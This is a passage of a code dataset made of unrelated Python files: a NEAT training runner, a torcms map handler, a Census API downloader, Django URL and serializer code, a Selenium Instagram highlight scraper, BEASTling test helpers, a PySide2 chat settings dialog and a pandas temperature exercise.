neat.DefaultReproduction,\n neat.DefaultSpeciesSet, neat.DefaultStagnation,\n config_path)\n\n # Create the population, which is the top-level object for a NEAT run.\n p = neat.Population(config)\n\n # Add a stdout reporter to show progress in the terminal.\n p.add_reporter(neat.StdOutReporter(True))\n stats = neat.StatisticsReporter()\n p.add_reporter(stats)\n p.add_reporter(neat.Checkpointer(1, filename_prefix=\"./NeatCheckpoints/neat-checkpoint-\"))\n\n winner = p.run(self.eval_genomes, self.gens)\n\n # Display the winning genome.\n print('\\nBest genome:\\n{!s}'.format(winner))\n\n with open('winner-feedforward', 'wb') as f:\n pickle.dump(winner, f)\n\n\nif __name__ == '__main__':\n # Determine path to configuration file. This path manipulation is\n # here so that the script will run successfully regardless of the\n # current working directory.\n\n NEATHandler(1000)\n","sub_path":"NEATHandler.py","file_name":"NEATHandler.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"581639403","text":"# -*- coding:utf-8 -*-\nimport random\n\nimport tornado.escape\nimport tornado.web\nfrom torcms.core import tools\n\nimport config\nfrom torcms.core.base_handler import BaseHandler\nfrom torcms.handlers.info_handler import InfoHandler\n\n\nclass InforRedirectHandler(BaseHandler):\n def get(self, url_str):\n self.redirect('/map/{0}'.format(url_str))\n\nclass MapHandler(InfoHandler):\n\n def extra_kwd(self, info_rec):\n\n post_data = {}\n for key in self.request.arguments:\n post_data[key] = self.get_arguments(key)\n\n out_dic = {\n 'marker': 1 if 'marker' in post_data else 0,\n 'geojson': post_data['gson'][0] if 'gson' in post_data else '',\n 'map_hist_arr': self.extra_view(info_rec.uid),\n\n }\n if 'zoom' in post_data :\n out_dic['vzoom'] = post_data['zoom'][0]\n if 'lat' in post_data :\n out_dic['vlat'] = post_data['lat'][0]\n if 'lon' in post_data :\n out_dic['vlon'] = post_data['lon'][0]\n return out_dic\n\n\n def extra_view(self, app_id):\n qian = self.get_secure_cookie('map_hist')\n if qian:\n qian = qian.decode('utf-8')\n else:\n qian = ''\n self.set_secure_cookie('map_hist', (app_id + qian)[:20])\n map_hist = []\n if self.get_secure_cookie('map_hist'):\n for xx in range(0, len(self.get_secure_cookie('map_hist').decode('utf-8')), 4):\n map_hist.append(self.get_secure_cookie('map_hist').decode('utf-8')[xx: xx + 4])\n return map_hist\n\n def get_tmpl_name(self, rec):\n if 'fullscreen' in self.request.arguments:\n tmpl = 'infor/app/full_screen.html'\n else:\n\n tmpl = 'infor/app/show_map.html'\n return tmpl\n","sub_path":"extor/handlers/map_handler.py","file_name":"map_handler.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"431118895","text":"import sys\nimport os\nfrom os.path import join, dirname\nfrom dotenv import load_dotenv\nimport requests\nimport json\nimport ast\nimport numpy\nimport datetime\nimport csv\nimport errno\nimport analysis\n\nBASE_URL = \"http://api.census.gov/data/2014/acs5\"\nBASE = \"/Users/willsumfest/preto3\"\nCOUNTY_FILE = BASE + \"/census/ca_counties.csv\"\n\n\"\"\"\nFunctionality of mkdir -p in unix command line system.\n\"\"\"\ndef mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError as exc:\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise\n\n\"\"\"\nFunction that takes a list of parameters and a county and creates a census url for a request.\nNote that the state is 06 since we are working exclusively in california in this stage.\n\"\"\"\ndef make_url(parameters, county=\"\"):\n head = dirname(os.getcwd())\n dotenv_path = join(head, '.env')\n load_dotenv(dotenv_path)\n parameters = make_params(parameters)\n if county != \"\":\n url = BASE_URL + \"?get=\" + parameters + \"&for=county:\" + county + \"&in=state:06&key=\" + os.environ.get('CENSUS_API_KEY')\n else:\n url = BASE_URL + \"?get=\" + parameters + \"&for=state:06&key=\" + os.environ.get('CENSUS_API_KEY')\n return url\n\n\n\"\"\"\nCreates a string from a list of parameters.\n\"\"\"\ndef make_params(parameters):\n params = \"\"\n for item in parameters:\n params += str(item) + \",\"\n params = params[:-1]\n return params\n \n\"\"\"\nReceives data from the census format and post processes it into relational data to insert into csv file.\nWe will use this csv file to perform our statistical analysis.\n\"\"\"\ndef post_process(data, county_code=\"\"):\n evaluation = ast.literal_eval(data)\n a = numpy.asarray(evaluation)\n if county_code != \"\":\n Dir = os.getcwd() + \"/simulations/\" + county_code\n mkdir_p(Dir)\n name = Dir + \"/\" + datetime.datetime.now().strftime('%Y-%m-%d-%H:%M') + \".csv\"\n else:\n Dir = os.getcwd() + \"/simulations/\" + \"CA_whole\"\n mkdir_p(Dir)\n name = Dir + \"/\" + datetime.datetime.now().strftime('%Y-%m-%d-%H:%M') + \".csv\"\n numpy.savetxt(name, a, delimiter=\",\", fmt=\"%s\")\n return\n\n\n\"\"\"\nWe need a county and a list of parameters, and we will make an api request to the census.\n\"\"\"\ndef main(parameters):\n #For all counties in CA\n with open(COUNTY_FILE, \"r\") as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n county_code = row[\"county_code\"]\n url = make_url(parameters, county=county_code)\n response = requests.get(url)\n post_process(response.text, county_code=county_code)\n #For CA as a whole\n url = make_url(parameters)\n response = requests.get(url)\n post_process(response.text)\n analysis.main()\n return\n \n\nif __name__ == '__main__':\n os.chdir(BASE + \"/census\")\n parameters = [\"B01001_001E\", \"B01001_001M\", \"B06009_001E\", \"B06009_001M\", \"B06009_002E\", \"B06009_002M\"]\n main(parameters)\n\n","sub_path":"census/demographics.py","file_name":"demographics.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"29350872","text":"from django.conf.urls import url, include\n\nfrom mdta.apps.projects import views\n\nurlpatterns = [\n url(r'^$', views.projects, name='projects'),\n url(r'^project_dashboard', views.project_dashboard, name='project_dashboard'),\n url(r'^project_config/(?P\\d+)/$', views.project_config, name='project_config'),\n url(r'^new/$', views.project_new, name='project_new'),\n url(r'^edit/(?P\\d+)/$', views.project_edit, name='project_edit'),\n\n url(r'^module_new/$', views.module_new, name='module_new'),\n url(r'^module_edit/(?P\\d+)/$', views.module_edit, name='module_edit'),\n\n url(r'^test_header_new/$', views.test_header_new, name='test_header_new'),\n url(r'^test_header_edit/$', views.test_header_edit, name='test_header_edit'),\n\n url(r'^language_new/$', views.language_new, name='language_new'),\n url(r'^language_new_from_module_import/$', views.language_new_from_module_import, name='language_new_from_module_import'),\n url(r'^get_language_detail_for_import_module/$', views.get_language_detail_for_import_module, name='get_language_detail_for_import_module'),\n url(r'^language_edit/$', views.language_edit, name='language_edit'),\n\n url(r'^fetch_project_catalogs_members', views.fetch_project_catalogs_members, name='fetch_project_catalogs_members'),\n\n url(r'^project_data_migrate/(?P\\d+)/$', views.project_data_migrate, name='project_data_migrate'),\n\n url(r'^', include('mdta.apps.projects.urls_dbset')),\n]\n","sub_path":"mdta/apps/projects/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"363788925","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import NoSuchElementException\nimport time\nimport urllib3, shutil\nfrom account import *\n\nbrowser = webdriver.Chrome()\naction = ActionChains(browser)\npublic_url = 'https://www.instagram.com/accounts/login/?next=/gnfi/'\n\nbrowser.get(public_url)\ntime.sleep(1)\nurlnow = browser.current_url.split(\"/\")\ntime.sleep(1)\n\ndata_posters = []\n\ndef xpathselector(xpath):\n return browser.find_element_by_xpath(xpath)\n\ndef check_exists_by_class(classname):\n try:\n browser.find_element_by_class_name(classname)\n except NoSuchElementException:\n return False\n return True\n\ndef check_exists_by_xpath(xpath):\n try:\n browser.find_element_by_xpath(xpath)\n except NoSuchElementException:\n return False\n return True\n\nusername = xpathselector('//*[@id=\"loginForm\"]/div/div[1]/div/label/input').send_keys(account[0])\npassword = xpathselector('//*[@id=\"loginForm\"]/div/div[2]/div/label/input').send_keys(account[1])\nbtn_login = xpathselector('//*[@id=\"loginForm\"]/div/div[3]/button').click()\ntime.sleep(6)\nxpathselector('//*[@id=\"react-root\"]/section/main/div/div/div/div/button').click()\ntime.sleep(3)\nif(check_exists_by_class('_54f4m') == True):\n print('private')\nelse:\n _current_highlight = 1\n highlight_count = browser.find_elements_by_class_name('Ckrof')\n if len(highlight_count) > 3:\n while _current_highlight <= len(highlight_count): \n currentpath = f'//*[@id=\"react-root\"]/section/main/div/div[1]/div/div/div/ul/li[{_current_highlight + 2}]' \n try:\n xpathselector(currentpath).click()\n time.sleep(3)\n _current_stories = 0\n stories_count = browser.find_elements_by_class_name('_7zQEa')\n print(_current_highlight, len(stories_count))\n xpathselector('//*[@id=\"react-root\"]/section/div[3]/button').click()\n if _current_highlight == highlight_count:\n break\n if _current_highlight >= 8:\n nexthighlight = xpathselector('//*[@id=\"react-root\"]/section/main/div/div[1]/div/button').click()\n xpathselector(currentpath).click()\n time.sleep(3)\n _current_stories = 0\n stories_count = browser.find_elements_by_class_name('_7zQEa')\n print(_current_highlight, len(stories_count))\n xpathselector('//*[@id=\"react-root\"]/section/div[3]/button').click()\n _current_highlight += 1\n except:\n pass \n else:\n currentpath = f'//*[@id=\"react-root\"]/section/main/div/div[1]/div/div/div/ul/li[{_current_highlight + 2}]'\n xpathselector(currentpath).click()\n time.sleep(2)\n stories_count = browser.find_elements_by_class_name('_7zQEa')\n print(len(stories_count))\n # browser.quit()\n \n\n# try:\n# nexthighlight = xpathselector('//*[@id=\"react-root\"]/section/main/div/div[1]/div/button')\n# action.double_click(nexthighlight).perform()\n# except:\n# pass\n \n\n\n \n\n\n\n\n\n\n\n \n\n\n\n \n\n \n\n\n \n \n\n\n\n\n\n\n\n\n","sub_path":"WEEK 10/scrap_highlight.py","file_name":"scrap_highlight.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"604728407","text":"# coding: utf8\nfrom __future__ import unicode_literals\nimport unittest\nfrom tempfile import mkdtemp\nimport sys\nfrom contextlib import contextmanager\n\nfrom six import BytesIO, StringIO\n\nfrom clldutils.path import Path, rmtree\nfrom clldutils.misc import nfilter\n\nfrom beastling.configuration import Configuration\n\n\nCACHE = dict(classifications=None, locations=None, glotto_macroareas=None)\n\n#### Below is rescued code from clldutils/testing.py which has been removed.\n#### This is a hacky temp fix until BEASTling adopts pytest.\n\nclass WithTempDirMixin(object):\n \"\"\"\n Composable test fixture providing access to a temporary directory.\n\n http://nedbatchelder.com/blog/201210/multiple_inheritance_is_hard.html\n \"\"\"\n def setUp(self):\n super(WithTempDirMixin, self).setUp()\n self.tmp = Path(mkdtemp())\n\n def tearDown(self):\n rmtree(self.tmp, ignore_errors=True)\n super(WithTempDirMixin, self).tearDown()\n\n def tmp_path(self, *comps):\n return self.tmp.joinpath(*comps)\n\n\nclass WithTempDir(WithTempDirMixin, unittest.TestCase):\n \"\"\"\n Backwards compatible test base class.\n \"\"\"\n\n\n@contextmanager\ndef capture(func, *args, **kw):\n with capture_all(func, *args, **kw) as res:\n yield res[1]\n\n\n@contextmanager\ndef capture_all(func, *args, **kw):\n out, sys.stdout = sys.stdout, StringIO()\n err, sys.stderr = sys.stderr, StringIO()\n ret = func(*args, **kw)\n sys.stdout.seek(0)\n sys.stderr.seek(0)\n yield ret, sys.stdout.read(), sys.stderr.read()\n sys.stdout, sys.stderr = out, err\n\n#### End of clldutils/testing.py code\n\nclass WithConfigAndTempDir(WithTempDir):\n def make_cfg(self, configfile, from_cache=True):\n config = Configuration(configfile=configfile)\n if from_cache:\n if not CACHE['classifications']:\n try:\n config.process()\n for k in CACHE:\n CACHE[k] = getattr(config, k)\n except:\n pass\n if CACHE['classifications']:\n for k, v in CACHE.items():\n setattr(config, k, v)\n return config\n\n\ndef tests_path(*comps):\n return Path(__file__).parent.joinpath(*nfilter(comps))\n\n\ndef data_path(*comps):\n return tests_path('data', *comps)\n\n\ndef config_path(name, bad=False):\n if not name.endswith('.conf'):\n name += '.conf'\n return tests_path('configs', 'bad_configs' if bad else None, name)\n\n\n@contextmanager\ndef old_capture(func, *args, **kw):\n out, sys.stdout = sys.stdout, BytesIO()\n oute, sys.stderr = sys.stderr, BytesIO()\n func(*args, **kw)\n sys.stdout.seek(0)\n sys.stderr.seek(0)\n yield sys.stdout.read(), sys.stderr.read()\n sys.stdout, sys.stderr = out, oute\n","sub_path":"tests/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"48143226","text":"import sys\n\nfrom PySide2 import QtCore, QtGui, QtWidgets\nfrom threading import Thread\n\ntry:\n\tfrom . import res_rc\nexcept ImportError:\n\timport res_rc\n\n\nCONNECT = \"user.connect\"\nDISCONNECT = \"user.disconnect\"\nNICK_CHANGE = \"user.rename\"\nNICK_SET = \"user.setname\"\nGET_ID = \"user.getid\"\nCHECK = \"user.check\"\nMSG = \"messages.send\"\n\n\nclass Ui_Dialog(object):\n\tdef setupUi(self, Dialog):\n\t\tDialog.setObjectName(\"Dialog\")\n\t\tDialog.resize(410, 140)\n\t\tDialog.setMinimumSize(QtCore.QSize(410, 140))\n\t\tDialog.setMaximumSize(QtCore.QSize(410, 140))\n\t\ticon = QtGui.QIcon()\n\t\ticon.addPixmap(QtGui.QPixmap(\":/menuBar/icons/settings.png\"),\n\t\t\t\t\t QtGui.QIcon.Normal, QtGui.QIcon.Off)\n\t\tDialog.setWindowIcon(icon)\n\t\tself.generalBox = QtWidgets.QGroupBox(Dialog)\n\t\tself.generalBox.setGeometry(QtCore.QRect(10, 10, 391, 81))\n\t\tself.generalBox.setStyleSheet(\"QGroupBox {\\n\"\n\t\t\t\t\t\t\t\t\t \"font-size: 12px;\\n\"\n\t\t\t\t\t\t\t\t\t \"}\\n\"\n\t\t\t\t\t\t\t\t\t \"QLabel {\\n\"\n\t\t\t\t\t\t\t\t\t \"font-size: 13px;\\n\"\n\t\t\t\t\t\t\t\t\t \"}\")\n\t\tself.generalBox.setObjectName(\"generalBox\")\n\t\tself.formLayoutWidget = QtWidgets.QWidget(self.generalBox)\n\t\tself.formLayoutWidget.setGeometry(QtCore.QRect(9, 20, 201, 48))\n\t\tself.formLayoutWidget.setObjectName(\"formLayoutWidget\")\n\t\tself.generalForm = QtWidgets.QFormLayout(self.formLayoutWidget)\n\t\tself.generalForm.setContentsMargins(0, 0, 0, 0)\n\t\tself.generalForm.setObjectName(\"generalForm\")\n\t\tself.nicknameLabel = QtWidgets.QLabel(self.formLayoutWidget)\n\t\tself.nicknameLabel.setStyleSheet(\"\")\n\t\tself.nicknameLabel.setObjectName(\"nicknameLabel\")\n\t\tself.generalForm.setWidget(\n\t\t\t0, QtWidgets.QFormLayout.LabelRole, self.nicknameLabel)\n\t\tself.nicknameLine = QtWidgets.QLineEdit(self.formLayoutWidget)\n\t\tself.nicknameLine.setContextMenuPolicy(QtCore.Qt.NoContextMenu)\n\t\tself.nicknameLine.setAcceptDrops(False)\n\t\tself.nicknameLine.setInputMethodHints(QtCore.Qt.ImhLatinOnly)\n\t\tself.nicknameLine.setMaxLength(13)\n\t\tself.nicknameLine.setPlaceholderText(\"\")\n\t\tself.nicknameLine.setClearButtonEnabled(False)\n\t\tself.nicknameLine.setObjectName(\"nicknameLine\")\n\t\tself.generalForm.setWidget(\n\t\t\t0, QtWidgets.QFormLayout.FieldRole, self.nicknameLine)\n\t\tself.hostLabel = QtWidgets.QLabel(self.formLayoutWidget)\n\t\tself.hostLabel.setStyleSheet(\"\")\n\t\tself.hostLabel.setObjectName(\"hostLabel\")\n\t\tself.generalForm.setWidget(\n\t\t\t1, QtWidgets.QFormLayout.LabelRole, self.hostLabel)\n\t\tself.hostLine = QtWidgets.QLineEdit(self.formLayoutWidget)\n\t\tself.hostLine.setAcceptDrops(False)\n\t\tself.hostLine.setInputMethodHints(QtCore.Qt.ImhLatinOnly)\n\t\tself.hostLine.setText(\"\")\n\t\tself.hostLine.setMaxLength(40)\n\t\tself.hostLine.setObjectName(\"hostLine\")\n\t\tself.generalForm.setWidget(\n\t\t\t1, QtWidgets.QFormLayout.FieldRole, self.hostLine)\n\t\tself.loading_icon = QtWidgets.QPushButton(self.generalBox)\n\t\tself.loading_icon.setGeometry(QtCore.QRect(220, 13, 56, 56))\n\t\tself.loading_icon.setStyleSheet(\"QPushButton {\\n\"\n\t\t\t\t\t\t\t\t\t\t\"background-color: None;\\n\"\n\t\t\t\t\t\t\t\t\t\t\"border: none;\\n\"\n\t\t\t\t\t\t\t\t\t\t\"}\\n\"\n\t\t\t\t\t\t\t\t\t\t\"QPushButton:hover {\\n\"\n\t\t\t\t\t\t\t\t\t\t\"background-color: None;\\n\"\n\t\t\t\t\t\t\t\t\t\t\"}\")\n\t\tself.loading_icon.setText(\"\")\n\t\ticon1 = QtGui.QIcon()\n\t\ticon1.addPixmap(QtGui.QPixmap(\":/icons/icons/loading.png\"),\n\t\t\t\t\t\tQtGui.QIcon.Normal, QtGui.QIcon.Off)\n\t\tself.loading_icon.setIcon(icon1)\n\t\tself.loading_icon.setIconSize(QtCore.QSize(64, 64))\n\t\tself.loading_icon.setObjectName(\"loading_icon\")\n\t\tself.horizontalLayoutWidget = QtWidgets.QWidget(Dialog)\n\t\tself.horizontalLayoutWidget.setGeometry(QtCore.QRect(240, 90, 158, 41))\n\t\tself.horizontalLayoutWidget.setObjectName(\"horizontalLayoutWidget\")\n\t\tself.saveLayout = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget)\n\t\tself.saveLayout.setContentsMargins(0, 0, 0, 0)\n\t\tself.saveLayout.setObjectName(\"saveLayout\")\n\t\tself.saveButton = QtWidgets.QPushButton(self.horizontalLayoutWidget)\n\t\tself.saveButton.setObjectName(\"saveButton\")\n\t\tself.saveLayout.addWidget(self.saveButton)\n\t\tself.cancelButton = QtWidgets.QPushButton(self.horizontalLayoutWidget)\n\t\tself.cancelButton.setObjectName(\"cancelButton\")\n\t\tself.saveLayout.addWidget(self.cancelButton)\n\n\t\tself.retranslateUi(Dialog)\n\t\tQtCore.QMetaObject.connectSlotsByName(Dialog)\n\n\tdef retranslateUi(self, Dialog):\n\t\t_translate = QtCore.QCoreApplication.translate\n\t\tDialog.setWindowTitle(_translate(\"Dialog\", \"Settings\"))\n\t\tself.generalBox.setTitle(_translate(\"Dialog\", \"General\"))\n\t\tself.nicknameLabel.setText(_translate(\"Dialog\", \"Nickname\"))\n\t\tself.hostLabel.setText(_translate(\"Dialog\", \"Host\"))\n\t\tself.saveButton.setText(_translate(\"Dialog\", \"Save\"))\n\t\tself.cancelButton.setText(_translate(\"Dialog\", \"Cancel\"))\n\n\nclass Settings(QtWidgets.QDialog, Ui_Dialog):\n\tCONNECTION_SIGNAL = QtCore.Signal(bool, str, str)\n\n\tdef __init__(self, window, server, config):\n\t\tsuper().__init__()\n\t\tself.setupUi(self)\n\t\tself.loading(False)\n\n\t\tself.INCORRECT_NICKNAME = \"Invalid nickname.\" \\\n\t\t\t\t\t\t\t\t\t\"Your new nickname should not to: \" \\\n\t\t\t\t\t\t\t\t\t\"consists of spaces, \" \\\n\t\t\t\t\t\t\t\t\t\"been shorter than 3 syms\"\n\n\t\tself.NICKNAME_EXISTS = \"This nickname alreay taken\"\n\t\tself.INCORRECT_HOST = \"Having trouble trying to connect to specified host\"\n\n\t\tself.text = \"\"\n\t\tself.re_open = False\n\n\t\tself.window = window\n\t\tself.config = config\n\t\tself.server = server\n\n\t\tself.CONNECTION_SIGNAL.connect(self.on_connection)\n\t\tself.saveButton.clicked.connect(self.run_)\n\t\tself.cancelButton.clicked.connect(self.close_)\n\n\tdef run_(self):\n\t\t'''\n\t\tнажата кнопка save\n\t\t'''\n\n\t\tself.loading(True)\n\n\t\tself.window.listening_is_on(False)\n\t\tthread = Thread(target = self.run_in_thread)\n\t\tthread.start()\n\n\tdef run_in_thread(self):\n\t\tname = self.nicknameLine.text()\n\t\thost = self.hostLine.text()\n\t\t\n\t\tis_host_correct = self.check_connect_to_host(host)\n\n\t\tif is_host_correct:\n\t\t\tself.config.write(\"host\", host)\n\t\t\tself.window.read_config(host=True)\n\t\telse:\n\t\t\tprint(\"Host isn't correct!\")\n\t\t\treturn self.CONNECTION_SIGNAL.emit(is_host_correct, name, host)\n\n\t\tprint(f'''[{self.run_in_thread.__name__}]: Going to create connection, params:\n\t\t\t is_host_correct - {is_host_correct}, name - {name}, host - {host}...''')\n\n\t\treturn self.CONNECTION_SIGNAL.emit(is_host_correct, name, host)\n\n\tdef check_connect_to_host(self, host):\n\t\tprint(f\"[{self.check_connect_to_host.__name__}]: going to check connection...\", end=\"\")\n\n\t\tif self.server.respond and host == self.config.read(\"host\"):\n\t\t\tprint(\"connected.\")\n\t\t\treturn True\n\t\telif (self.server.respond and host != self.config.read(\"host\")) or not self.server.respond:\n\t\t\tprint(\"disconnected.\")\n\n\t\t\ttry:\n\t\t\t\tself.server.init(host)\n\t\t\texcept:\n\t\t\t\tself.text = self.INCORRECT_HOST\n\t\t\t\treturn False\n\n\t\t\tif not self.server.respond:\n\t\t\t\tself.text = self.INCORRECT_HOST\n\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\tself.config.write(\"host\", self.server.host)\n\t\t\t\tself.window.read_config()\n\n\t\t\treturn True\n\n\t@QtCore.Slot() # from CONNECTION_SIGNAL\n\tdef on_connection(self, is_host_correct, name, host):\n\t\tself.loading(False)\n\n\t\tif not is_host_correct:\n\t\t\tself.window.info_window(self.text)\n\t\t\tself.re_open = True\n\t\t\treturn self.close()\n\n\t\tresult, self.text = self.name_is_correct(name)\n\n\t\tself.window.listening_is_on(True)\n\n\t\tif result:\n\t\t\tself.config.write(\"nickname\", name)\n\t\t\tself.window.read_config()\n\n\t\t\tif not self.window.connection_established:\n\t\t\t\tself.window.connect_to_server()\n\n\t\t\treturn self.close()\n\t\telse:\n\t\t\tself.window.info_window(self.text)\n\t\t\tself.re_open = True\n\t\t\treturn self.close()\n\n\tdef name_is_correct(self, name):\n\n\t\t# если имя введено корректно, то проверяем айпи, иначе выходим и говорим пользователю, что нужно исправить имя\n\n\t\tprint(f\"[{self.name_is_correct.__name__}]: Checking if nickname correct...\", end=\"\")\n\n\t\tif not name.isspace() and len(name) > 3 and name != \"\":\n\t\t\tprint(\"name format correct\")\n\t\t\tres_name = self.check_name(name)\n\t\telse:\n\t\t\tprint(\"name format isn't correct\")\n\t\t\treturn (False, self.INCORRECT_NICKNAME)\n\n\t\tif not res_name:\n\t\t\treturn (False, self.NICKNAME_EXISTS)\n\t\telse:\n\t\t\treturn (True, \"\")\n\n\tdef check_name(self, name):\n\t\tprint(f\"[{self.check_name.__name__}]: name {'!=' if name != self.config.read('nickname') else '=='} \" \\\n\t\t\t f\"self.config.read('nickname')...\", end=\"\")\n\n\t\tif name != self.config.read(\"nickname\"):\n\t\t\tprint(\"Checking nickname...\", end=\"\")\n\n\t\t\tself.server.method(\"user.getUsernames\")\n\n\t\t\tresult = self.window.get_data(\"usernames\")\n\n\t\t\tif name in result[\"usernames\"]:\n\t\t\t\tprint(\"nickname already taken...\")\n\t\t\t\treturn False\n\n\t\t\tif self.config.read(\"nickname\") == \"\":\n\t\t\t\tprint(\"OK...\", end=\"\")\n\n\t\t\t\tself.window.write_signal.emit(\n\t\t\t\t\tNICK_CHANGE, \"\", \"Your\", f\"{name}\", \"\")\n\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\tself.server.method(NICK_CHANGE, {\"id\": self.config.read(\"user_id\"), \"nickname\": name})\n\n\t\treturn True\n\n\tdef close_(self):\n\t\t'''\n\t\tнажата кнопка cancel\n\t\t'''\n\n\t\tif self.window.connection_established:\n\t\t\tself.re_open = False\n\t\telse:\n\t\t\tself.re_open = True\n\t\t\n\t\tself.close()\n\n\tdef closeEvent(self, evnt):\n\t\t'''\n\t\tвызывается при знакрытии окна\n\t\t'''\n\n\t\tif self.window.connection_established:\n\t\t\tself.nicknameLine.setText(self.config.read(\"nickname\"))\n\t\t\tself.hostLine.setText(self.config.read(\"host\"))\n\t\t\tevnt.accept()\n\t\telse:\n\t\t\tif self.re_open:\n\t\t\t\tself.re_open = False\n\t\t\t\tevnt.accept()\n\t\t\telse:\n\t\t\t\tself.window.config.close()\n\t\t\t\tsys.exit(0)\n\n\tdef fields_filler(self, name=False, host=False):\n\t\tif (not name) and (not host):\n\t\t\tself.nicknameLine.setText(\"\")\n\t\t\t# http://127.0.0.1:5000\n\t\t\t# SadScream.pythonanywhere.com\n\t\t\tself.hostLine.setText(\"127.0.0.1:5000\")\n\t\telif name and (not host):\n\t\t\tself.nicknameLine.setText(name)\n\t\telif (not name) and host:\n\t\t\tself.hostLine.setText(host)\n\t\telif name and host:\n\t\t\tself.nicknameLine.setText(name)\n\t\t\tself.hostLine.setText(host)\t\n\n\tdef loading(self, state):\n\t\t'''\n\t\tstate: True/False\n\t\t'''\n\n\t\tif state:\n\t\t\tself.loading_icon.show()\n\t\telif not state:\n\t\t\tself.loading_icon.hide()\n\n\t\tself.saveLayout.setEnabled(not state)\n\t\tself.generalBox.setEnabled(not state)\n","sub_path":"application/ui/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":9948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"41243278","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 30 12:49:33 2018\n\n@author: vicser\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\n\n\ndataFrame = pd.read_csv('Kumpula-June-2016-w-metadata.csv', sep=',')\nprint(dataFrame)\n\ndataFrame['DIFF']=dataFrame['MAX']-dataFrame['MIN']\n\nprint(dataFrame)\ndataFrame['DIFF_Min'] = dataFrame['TEMP'] - dataFrame['MIN']\n\n# Create a new column and convert temp fahrenheit to celsius:\ndataFrame['TEMP_Celsius'] = (dataFrame['TEMP'] - 32) / (9/5)\n\n\nprint(dataFrame)\n\n\n# Select first five rows of dataframe\n\nw_temps = dataFrame.loc[dataFrame['YEARMODA'] >= 20160615]\nprint(w_temps)\n\nw_temps2 = dataFrame.loc[(dataFrame['TEMP_Celsius'] > 15) &(dataFrame['YEARMODA'] >= 20160615)]\nprint(w_temps2)\n\nw_temps2 = w_temps2.reset_index(drop=True)\nprint(w_temps2)\nw_temps3=w_temps2;\n\n# Set temp_celsius as none in the first five rows\nw_temps3.loc[:4, 'TEMP_Celsius'] = None\nprint(w_temps3)\n\n# Drop no data values based on temp_celsius column\nw_temps_clean = w_temps3.dropna(subset=['TEMP_Celsius'])\n#w_temps_clean = w_temps2.fillna(0)\n\nprint(w_temps_clean.reset_index(drop=True))\n\n\n# Sort dataframe, ascending\nsorted_temp_a = dataFrame.sort_values(by='TEMP', ascending=False)\n\nprint(sorted_temp_a)\n\n# Create new column, and round celsius values\ndataFrame['Celsius_rounded'] = dataFrame['TEMP_Celsius'].round(0)\nprint(dataFrame)\n\n# Get unique celsius values\nunique = dataFrame['Celsius_rounded'].unique()\nprint(list(unique))\n\n\n# define output filename\noutput_fp = \"Kumpula_temps_June_2016.csv\"\n\n# Save dataframe to csv\ndataFrame.to_csv(output_fp, sep=',', index=False, float_format=\"%.2f\")\n\n# Specify output filename\nexcel_output_fp = \"Kumpula_temps_above15_June_2016.xlsx\"\n\n# Initialize ExcelWriter\nwriter = pd.ExcelWriter(excel_output_fp)\n\n#Write data to excel\nw_temps.to_excel(writer, sheet_name=\"Kumpula_temperatures\", index=False, float_format=\"%.1f\")\n\n\n\n\n\n\n\n\n\n\n\n\n\ns = pd.Series([1,3,5,np.nan,6,8])\ndates = pd.date_range('20130101',periods=6)\ndf = pd.DataFrame(np.random.randn(6,4),index=dates,columns=list('ABCD'))\n\n","sub_path":"ProcesingPanda.py","file_name":"ProcesingPanda.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"71548398","text":"from datetime import datetime\nfrom django.utils import timezone\nfrom django.utils.six import BytesIO\n\nimport os,django\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"gamesAPI.settings\")\ndjango.setup()\n\n# Parser and renders handle as mediators between python primitives and HTTP requests and responses\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.parsers import JSONParser\nfrom games.models import Game\nfrom games.serializers import GameSerializer\n\n\ngamedatetime=timezone.make_aware(datetime.now(),timezone.get_current_timezone())\ngame1=Game(name='name1', release_date=gamedatetime, game_category='2D mobile arcade', played=False)\ngame1.save()\ngame2=Game(name='name2', release_date=gamedatetime, game_category='3D RPG', played=False)\ngame2.save()\n# After we execute the preceding code, we notice the table has two rows and the columns have the values we have provided\n\n# Serialize the first game instance (game1)\ngame_serializer1=GameSerializer(game1)\nprint(game_serializer1.data)\n\n# Serialize the second game instance (game1)\ngame_serializer2=GameSerializer(game2)\nprint(game_serializer2.data)\n# output:\n# The following line shows the generated dictionary, specifically, a rest_framework.utils.serializer_helpers.ReturnDict instance\n# {'release_date': '2016-05-18T03:02:00.776594Z', 'game_category': '2D mobile arcade', 'played': False, 'pk': 2, 'name': 'Smurfs Jungle'}\n\n# We can easily render the dictionaries hold the data attribute into JSON with the help of rest_framework.renderers.JSONRenderer 